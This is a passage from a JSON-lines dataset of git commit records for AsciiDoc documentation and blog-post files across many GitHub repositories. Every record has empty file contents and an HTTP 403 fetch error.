document","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/plugin_use_cases.adoc","new_file":"userguide\/tutorials\/plugin_use_cases.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6842e43fb0a9e54c37e24872ef9dff52477f68de","subject":"Update 2017-06-22-A-very-good-article-on-the-rise-of-notebooks.adoc","message":"Update 2017-06-22-A-very-good-article-on-the-rise-of-notebooks.adoc","repos":"Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io","old_file":"_posts\/2017-06-22-A-very-good-article-on-the-rise-of-notebooks.adoc","new_file":"_posts\/2017-06-22-A-very-good-article-on-the-rise-of-notebooks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ardemius\/ardemius.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"706fffc99555a665211a67eb76b6f7adab1136a3","subject":"Update 2015-10-29-My-English-Title.adoc","message":"Update 2015-10-29-My-English-Title.adoc","repos":"gruenberg\/gruenberg.github.io,gruenberg\/gruenberg.github.io,gruenberg\/gruenberg.github.io","old_file":"_posts\/2015-10-29-My-English-Title.adoc","new_file":"_posts\/2015-10-29-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gruenberg\/gruenberg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"604c1151b279c61ef2ab6b9c8f7b271d8fc6ba4f","subject":"Update 2017-05-25-Pattern-matching.adoc","message":"Update 2017-05-25-Pattern-matching.adoc","repos":"seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io","old_file":"_posts\/2017-05-25-Pattern-matching.adoc","new_file":"_posts\/2017-05-25-Pattern-matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/seturne\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"555d803931e4d0c77588b91a7d714aab0cc5ac16","subject":"[DOC] Document Spark command line configuration","message":"[DOC] Document Spark command line configuration\n\nrelates #434\n","repos":"sarwarbhuiyan\/elasticsearch-hadoop,pranavraman\/elasticsearch-hadoop,holdenk\/elasticsearch-hadoop,aie108\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,yonglehou\/elasticsearch-hadoop,trifork\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,samkohli\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,lgscofield\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,jasontedor\/elasticsearch-hadoop,cgvarela\/elasticsearch-hadoop,girirajsharma\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,huangll\/elasticsearch-hadoop,puneetjaiswal\/elasticsearch-hadoop,kai5263499\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/huangll\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b699237304d60e3b638dd273e21346cf6de68350","subject":"fix(promise-then): \u753b\u50cf\u304c\u8868\u793a\u3055\u308c\u3066\u306a\u3044\u306e\u3092\u4fee\u6b63","message":"fix(promise-then): \u753b\u50cf\u304c\u8868\u793a\u3055\u308c\u3066\u306a\u3044\u306e\u3092\u4fee\u6b63\n","repos":"wangwei1237\/promises-book,wangwei1237\/promises-book,wenber\/promises-book,tangjinzhou\/promises-book,dieface\/promises-book,xifeiwu\/promises-book,azu\/promises-book,genie88\/promises-book,liyunsheng\/promises-book,cqricky\/promises-book,lidasong2014\/promises-book,oToUC\/promises-book,genie88\/promises-book,azu\/promises-book,purepennons\/promises-book,liyunsheng\/promises-book,dieface\/promises-book,wenber\/promises-book,cqricky\/promises-book,mzbac\/promises-book,oToUC\/promises-book,tangjinzhou\/promises-book,liyunsheng\/promises-book,tangjinzhou\/promises-book,charlenopires\/promises-book,wenber\/promises-book,liubin\/promises-book,purepennons\/promises-book,azu\/promises-book,dieface\/promises-book,oToUC\/promises-book,sunfurong\/promise,xifeiwu\/promises-book,liubin\/promises-book,liubin\/promises-book,charlenopires\/promises-book,mzbac\/promises-book,lidasong2014\/promises-book,mzbac\/promises-book,wangwei1237\/promises-book,sunfurong\/promise,lidasong2014\/promises-book,xifeiwu\/promises-book,cqricky\/promises-book,purepennons\/promises-book,charlenopires\/promises-book,azu\/promises-book,genie88\/promises-book,sunfurong\/promise","old_file":"Ch2_HowToWrite\/promise-then.adoc","new_file":"Ch2_HowToWrite\/promise-then.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"51643c5368bb542b612789714c010f56c7571373","subject":"Update 2016-06-15-Resources-on-Documentation-Driven-Development.adoc","message":"Update 2016-06-15-Resources-on-Documentation-Driven-Development.adoc","repos":"Driven-Development\/Driven-Development.github.io,Driven-Development\/Driven-Development.github.io,Driven-Development\/Driven-Development.github.io,Driven-Development\/Driven-Development.github.io","old_file":"_posts\/2016-06-15-Resources-on-Documentation-Driven-Development.adoc","new_file":"_posts\/2016-06-15-Resources-on-Documentation-Driven-Development.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Driven-Development\/Driven-Development.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1bcda458c7c0c062b6407efe1c36017ed2b3c53","subject":"Update 2019-06-16-mind-fuck.adoc","message":"Update 2019-06-16-mind-fuck.adoc","repos":"debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io","old_file":"_posts\/2019-06-16-mind-fuck.adoc","new_file":"_posts\/2019-06-16-mind-fuck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debbiezhu\/debbiezhu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e0212abb0b5dc9625fd3655bc3b70520e463d05","subject":"Fixed typo in testing section (#777)","message":"Fixed typo in testing section (#777)\n\n","repos":"kenfinnigan\/wildfly-swarm,juangon\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,juangon\/wildfly-swarm,juangon\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,juangon\/wildfly-swarm,juangon\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,kenfinnigan\/wildfly-swarm,kenfinnigan\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm,kenfinnigan\/wildfly-swarm,kenfinnigan\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core","old_file":"docs\/howto\/test-in-container\/index.adoc","new_file":"docs\/howto\/test-in-container\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/juangon\/wildfly-swarm.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f7a377f5e9c8625c221c2bbd2bf7105f4cb39e65","subject":"Update 2016-08-20.adoc","message":"Update 2016-08-20.adoc","repos":"bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io","old_file":"_posts\/2016-08-20.adoc","new_file":"_posts\/2016-08-20.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bitcowboy\/bitcowboy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb385ea2fac902aef3cca83e22134707df88fccb","subject":"Update 2017-11-13.adoc","message":"Update 2017-11-13.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-11-13.adoc","new_file":"_posts\/2017-11-13.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a94e7e06a7cbc3a1c3f8392ea46ffb78d4f49b1","subject":"GUI docu","message":"GUI docu","repos":"MSG134\/IVCT_Framework,MSG134\/IVCT_Framework,MSG134\/IVCT_Framework","old_file":"docs\/src\/4-5-GUI.adoc","new_file":"docs\/src\/4-5-GUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MSG134\/IVCT_Framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6ebb7c7c99e684ca9c47592f17f9920b1e4d8b0a","subject":"y2b create post Beats By Dre Powerbeats Unboxing \\u0026 Overview","message":"y2b create post Beats By Dre Powerbeats Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-01-10-Beats-By-Dre-Powerbeats-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-01-10-Beats-By-Dre-Powerbeats-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f81b8bcaef8365d0c52bf3c87af2bccb4274bece","subject":"Updated Explorer ProgramsCache documentation","message":"Updated Explorer ProgramsCache documentation","repos":"libyal\/winreg-kb,libyal\/winreg-kb","old_file":"documentation\/Programs Cache values.asciidoc","new_file":"documentation\/Programs Cache values.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/winreg-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b21a60f21aca53f5798a54ed8ddf015e4d34d686","subject":"y2b create post BLACK FRIDAY DEALS! + Nexus 4 \\u0026 Wii U Giveaway!","message":"y2b create post BLACK FRIDAY DEALS! + Nexus 4 \\u0026 Wii U Giveaway!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-11-22-BLACK-FRIDAY-DEALS--Nexus-4-u0026-Wii-U-Giveaway.adoc","new_file":"_posts\/2012-11-22-BLACK-FRIDAY-DEALS--Nexus-4-u0026-Wii-U-Giveaway.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a59f5f92267453bcbe6e0c004d365e32be89f55","subject":"CAMEL-12583 - Added docs","message":"CAMEL-12583 - Added docs\n","repos":"DariusX\/camel,nikhilvibhav\/camel,tdiesler\/camel,CodeSmell\/camel,tdiesler\/camel,christophd\/camel,kevinearls\/camel,nicolaferraro\/camel,tdiesler\/camel,zregvart\/camel,zregvart\/camel,CodeSmell\/camel,apache\/camel,dmvolod\/camel,objectiser\/camel,pax95\/camel,kevinearls\/camel,cunningt\/camel,nikhilvibhav\/camel,adessaigne\/camel,anoordover\/camel,objectiser\/camel,CodeSmell\/camel,apache\/camel,onders86\/camel,adessaigne\/camel,jamesnetherton\/camel,anoordover\/camel,gnodet\/camel,dmvolod\/camel,anoordover\/camel,adessaigne\/camel,tadayosi\/camel,pmoerenhout\/camel,kevinearls\/camel,dmvolod\/camel,zregvart\/camel,onders86\/camel,Fabryprog\/camel,ullgren\/camel,dmvolod\/camel,christophd\/camel,mcollovati\/camel,anoordover\/camel,apache\/camel,cunningt\/camel,pax95\/camel,pax95\/camel,christophd\/camel,pmoerenhout\/camel,dmvolod\/camel,nikhilvibhav\/camel,adessaigne\/camel,gnodet\/camel,objectiser\/camel,punkhorn\/camel-upstream,alvinkwekel\/camel,kevinearls\/camel,kevinearls\/camel,nikhilvibhav\/camel,ullgren\/camel,DariusX\/camel,onders86\/camel,kevinearls\/camel,mcollovati\/camel,davidkarlsen\/camel,ullgren\/camel,alvinkwekel\/camel,zregvart\/camel,gnodet\/camel,gnodet\/camel,Fabryprog\/camel,jamesnetherton\/camel,christophd\/camel,dmvolod\/camel,christophd\/camel,CodeSmell\/camel,pax95\/camel,DariusX\/camel,cunningt\/camel,gnodet\/camel,tadayosi\/camel,ullgren\/camel,mcollovati\/camel,davidkarlsen\/camel,sverkera\/camel,nicolaferraro\/camel,Fabryprog\/camel,christophd\/camel,davidkarlsen\/camel,pmoerenhout\/camel,tadayosi\/camel,sverkera\/camel,jamesnetherton\/camel,sverkera\/camel,anoordover\/camel,Fabryprog\/camel,tadayosi\/camel,objectiser\/camel,alvinkwekel\/camel,cunningt\/camel,davidkarlsen\/camel,cunningt\/camel,adessaigne\/camel,sverkera\/camel,nicolaferraro\/camel,mcollovati\/camel,sverkera\/camel,punkhorn\/camel-upstream,jamesnetherton\/camel,nicolaferraro\/camel,punkhorn\/camel-upstream,jamesnetherton\/camel,sverkera\/camel,pax95\/camel,onders86\/camel,apache\/camel,onders86\/camel,punkhorn\/camel-upstream,cunningt\/camel,pmoerenhout\/camel,tdiesler\/camel,anoordover\/camel,tadayosi\/camel,pmoerenhout\/camel,onders86\/camel,apache\/camel,pax95\/camel,apache\/camel,tadayosi\/camel,pmoerenhout\/camel,alvinkwekel\/camel,tdiesler\/camel,jamesnetherton\/camel,adessaigne\/camel,DariusX\/camel,tdiesler\/camel","old_file":"components\/camel-kubernetes\/src\/main\/docs\/kubernetes-hpa-component.adoc","new_file":"components\/camel-kubernetes\/src\/main\/docs\/kubernetes-hpa-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"aa017703028874dbef7642670da6de99338ecd14","subject":"[DOCS] Add monitoring upgrade details (#29041)","message":"[DOCS] Add monitoring upgrade details (#29041)\n\n","repos":"rajanm\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,rajanm\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,kalimatas\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,s1monw\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,rajanm\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,s1monw\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,s1monw\/elasticsearch,s1monw\/elasticsearch,kalimatas\/elasticsearch,kalimatas\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,kalimatas\/elasticsearch,coding0011\/elasticsearch,rajanm\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,s1monw\/elasticsearch,scorpionvicky\/elasticsearch","old_file":"docs\/reference\/upgrade\/upgrade-node.asciidoc","new_file":"docs\/reference\/upgrade\/upgrade-node.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a957768ee5cfb9ab848f7fb267179624e54f697b","subject":"Update 2015-08-10-test.adoc","message":"Update 2015-08-10-test.adoc","repos":"enderxyz\/enderxyz.github.io,enderxyz\/enderxyz.github.io,enderxyz\/enderxyz.github.io","old_file":"_posts\/2015-08-10-test.adoc","new_file":"_posts\/2015-08-10-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/enderxyz\/enderxyz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db6b9f583fe6bfb544685f09f4344783f4533a95","subject":"Update 2017-05-06-Test.adoc","message":"Update 2017-05-06-Test.adoc","repos":"carsnwd\/carsnwd.github.io,carsnwd\/carsnwd.github.io,carsnwd\/carsnwd.github.io,carsnwd\/carsnwd.github.io","old_file":"_posts\/2017-05-06-Test.adoc","new_file":"_posts\/2017-05-06-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/carsnwd\/carsnwd.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3e4ed040d965067d8c379b801a5fb1e69885e7c","subject":"Update 2016-09-13-Vzyat-xml-iz-jar-kak-resurs-chego-mozhet-byt-proshe.adoc","message":"Update 2016-09-13-Vzyat-xml-iz-jar-kak-resurs-chego-mozhet-byt-proshe.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2016-09-13-Vzyat-xml-iz-jar-kak-resurs-chego-mozhet-byt-proshe.adoc","new_file":"_posts\/2016-09-13-Vzyat-xml-iz-jar-kak-resurs-chego-mozhet-byt-proshe.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"56f7c677b882067dfe69cdea40463d3612a35242","subject":"Update 2014-09-15-Choosing-a-Lisp.adoc","message":"Update 2014-09-15-Choosing-a-Lisp.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-09-15-Choosing-a-Lisp.adoc","new_file":"_posts\/2014-09-15-Choosing-a-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0513d988b9e8555f8dff22540f814c4647970378","subject":"Update 2016-03-11-public-suck-ios.adoc","message":"Update 2016-03-11-public-suck-ios.adoc","repos":"hbbalfred\/hbbalfred.github.io,hbbalfred\/hbbalfred.github.io,hbbalfred\/hbbalfred.github.io","old_file":"_posts\/2016-03-11-public-suck-ios.adoc","new_file":"_posts\/2016-03-11-public-suck-ios.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hbbalfred\/hbbalfred.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff0bbbcbdc0277411afcfc05416428a22ac488fc","subject":"[doc] contributing: fixed unordered list formatting","message":"[doc] contributing: fixed unordered list formatting\n\nChange-Id: I0d96e28767331ae81ff90f42dd5e68a5b3b83ab8\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/5066\nReviewed-by: Will Berkeley <c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\nTested-by: Kudu Jenkins\n","repos":"helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu","old_file":"docs\/contributing.adoc","new_file":"docs\/contributing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"09ec62ca6801819c9a18841ab7e8a78294cf835c","subject":"[docs] Remove some obsolete limitations related to disks","message":"[docs] Remove some obsolete limitations related to disks\n\nThis removes three known limitations that are not limitations anymore.\nThe new and improved state of things is documented in administration.adoc\nand the docs for the command line tools.\n\nChange-Id: If42f656eae596ccad3c196183705bd0599f348ec\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/10220\nTested-by: Will Berkeley <c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\n","repos":"InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/known_issues.adoc","new_file":"docs\/known_issues.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8b6052629b7e86dfc625897cd54c8054c8ea7d00","subject":"y2b create post Instagram for Android Hands-on (Download Link Included)","message":"y2b create post Instagram for Android Hands-on (Download Link Included)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-04-03-Instagram-for-Android-Handson-Download-Link-Included.adoc","new_file":"_posts\/2012-04-03-Instagram-for-Android-Handson-Download-Link-Included.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a059276d86682b7a40567ca6fd3ab0b6f5bb0f78","subject":"Update 2016-07-03-Rights-and-Duties.adoc","message":"Update 2016-07-03-Rights-and-Duties.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-03-Rights-and-Duties.adoc","new_file":"_posts\/2016-07-03-Rights-and-Duties.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5dc1391df3c29c6ac0507cf01e4166dadca6fdd0","subject":"Added Forge 2.16.1.Final release announcement","message":"Added Forge 2.16.1.Final release announcement\n","repos":"luiz158\/docs,forge\/docs,addonis1990\/docs,agoncal\/docs,luiz158\/docs,agoncal\/docs,forge\/docs,addonis1990\/docs","old_file":"news\/2015-05-19-forge-2.16.1.final.asciidoc","new_file":"news\/2015-05-19-forge-2.16.1.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"e776da17d5ac35f76688c39c217e8b0dbd01a7a5","subject":"y2b create post The Mind Blowing 33 Million Pixel Display...","message":"y2b create post The Mind Blowing 33 Million Pixel Display...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-26-The%20Mind%20Blowing%2033%20Million%20Pixel%20Display....adoc","new_file":"_posts\/2018-01-26-The%20Mind%20Blowing%2033%20Million%20Pixel%20Display....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dab502004a180bd636baac82e3110762cfd81e81","subject":"Publish 2097-1-1-Puzzle-4-No-Hacking.adoc","message":"Publish 2097-1-1-Puzzle-4-No-Hacking.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"2097-1-1-Puzzle-4-No-Hacking.adoc","new_file":"2097-1-1-Puzzle-4-No-Hacking.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aad3e2e7c620960a4d0e5da11dfca9021f81ae1d","subject":"write(promise-catch): IE8\u4ee5\u4e0b\u306e\u554f\u984c\u306b\u3064\u3044\u3066\u3092\u8ffd\u52a0","message":"write(promise-catch): IE8\u4ee5\u4e0b\u306e\u554f\u984c\u306b\u3064\u3044\u3066\u3092\u8ffd\u52a0\n","repos":"wenber\/promises-book,azu\/promises-book,tangjinzhou\/promises-book,oToUC\/promises-book,cqricky\/promises-book,cqricky\/promises-book,mzbac\/promises-book,genie88\/promises-book,mzbac\/promises-book,azu\/promises-book,lidasong2014\/promises-book,liubin\/promises-book,oToUC\/promises-book,liubin\/promises-book,azu\/promises-book,liubin\/promises-book,genie88\/promises-book,wangwei1237\/promises-book,purepennons\/promises-book,dieface\/promises-book,lidasong2014\/promises-book,liyunsheng\/promises-book,wangwei1237\/promises-book,dieface\/promises-book,tangjinzhou\/promises-book,genie88\/promises-book,sunfurong\/promise,purepennons\/promises-book,lidasong2014\/promises-book,mzbac\/promises-book,liyunsheng\/promises-book,sunfurong\/promise,purepennons\/promises-book,charlenopires\/promises-book,wenber\/promises-book,xifeiwu\/promises-book,dieface\/promises-book,sunfurong\/promise,tangjinzhou\/promises-book,xifeiwu\/promises-book,wangwei1237\/promises-book,oToUC\/promises-book,wenber\/promises-book,xifeiwu\/promises-book,liyunsheng\/promises-book,charlenopires\/promises-book,azu\/promises-book,cqricky\/promises-book,charlenopires\/promises-book","old_file":"Ch2_HowToWrite\/promise-catch.adoc","new_file":"Ch2_HowToWrite\/promise-catch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xifeiwu\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2546814157f6cfacce08f8100d89665068801b4f","subject":"Update 2015-10-02-First-Post.adoc","message":"Update 2015-10-02-First-Post.adoc","repos":"wink-\/wink-.github.io,wink-\/wink-.github.io,wink-\/wink-.github.io","old_file":"_posts\/2015-10-02-First-Post.adoc","new_file":"_posts\/2015-10-02-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wink-\/wink-.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80219bf53fc6af6c6b43d6ca105f8f2e8c2bce6a","subject":"Update 2016-06-28-First-post.adoc","message":"Update 2016-06-28-First-post.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-06-28-First-post.adoc","new_file":"_posts\/2016-06-28-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested 